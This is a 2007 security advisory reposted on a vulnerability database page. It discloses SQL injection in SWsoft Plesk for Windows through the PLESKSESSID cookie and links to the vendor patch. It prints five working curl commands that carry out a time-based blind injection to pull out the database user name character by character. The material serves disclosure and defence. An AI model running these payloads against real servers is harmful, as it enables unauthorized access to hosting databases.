Lucene search

K

hackersafe-plesk.txt

🗓️ 13 Sep 2007 00:00:00Reported by Nick MerrittType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

SWsoft Plesk for Windows - SQL Injection Vulnerability, Remote Attack, Plesk Control Panel, SQL Injection Pages, Patches Availabl

Show more
Code
`HackerSafe Labs - Security Advisory  
http://www.hackersafelabs.com  
  
SWsoft Plesk for Windows - SQL Injection Vulnerability  
  
Date: 9-11-07  
Vendor: www.swsoft.com  
Package: Plesk for Windows  
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0  
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3  
Credit: Nick I Merritt  
  
Risk:  
Related Exploit Range: Remote  
Attack Complexity: Medium  
Level of Authentication Needed: Not Required   
Confidentiality Impact: Major  
Integrity Impact: Major  
Availability Impact: Major  
  
Overview:  
SWsoft Plesk is a comprehensive control panel solution used by leading  
hosting providers worldwide for shared, virtual and dedicated hosting.   
  
Vulnerability:  
A SQL injection vulnerability exists in the Plesk application. Please  
see the following:  
  
SQL Injection Page 1: "login.php3"  
SQL Injection Page 2: "auth.php3"  
SQL Injection Cookie Parameter: "PLESKSESSID"  
  
Example: (Will extract the database user)  
  
1) Delay=5224.3877   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
2) Delay=5165.3031   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
3) Delay=5158.9512   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
4) Delay=5224.0980   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
5) Delay=5241.5251   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
Solution: Apply the following patches - http://kb.swsoft.com/en/2159  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report